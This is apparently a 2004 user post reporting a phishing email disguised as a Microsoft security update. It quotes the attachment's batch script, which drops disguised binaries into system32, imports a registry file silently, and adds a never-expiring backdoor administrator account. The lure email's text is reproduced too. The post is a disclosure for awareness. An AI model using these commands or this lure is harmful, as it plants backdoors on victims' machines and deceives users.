I've just received a fake microsoft email with a 744kb patch attached. It was not detected by my Norton, not by F-Prot, nor AVG or McAffee.
In this patch it has a start batch file which does this:
@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER
/TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
cls
UPDATE.EXE
cls
exit
I've attached the email without the virus so you can have a look at it.
Adrian
--- Begin Message ---
Critical announcements
An important security announcement to all Microsoft Windows users!
Critical Security Update for Microsoft Windows (KB2856093)
A critical security issue has been identified that could allow an attacker to compromise a computer running Windows and gain control over your system and files. This issue has been discussed in KB2856093 Microsoft Knowledge Base. Microsoft Security Response Team recommends to protect your computer by installing this update from Microsoft.
Patch Information:
Type: Critical Security Update Vulnerability: High Vendor notified: April 29, 2004 Update Release Date: May 02, 2004 Download Size: 744 KB, < 2 minutes @ 28.8 modem File Name: WINDOWS-KB2856093-X86-ENU.EXE Affected Versions: Microsoft Windows 95/98/ME/NT/2000/XP/2003 To install this update, follow these instructions:
1 Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or open an attached file.
2 Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions.
3 After you install this item, you may have to restart your computer, to ensure a full protection.
©2004 Microsoft Corporation. All rights reserved.
Terms of Use | Privacy Statement
--- End Message ---
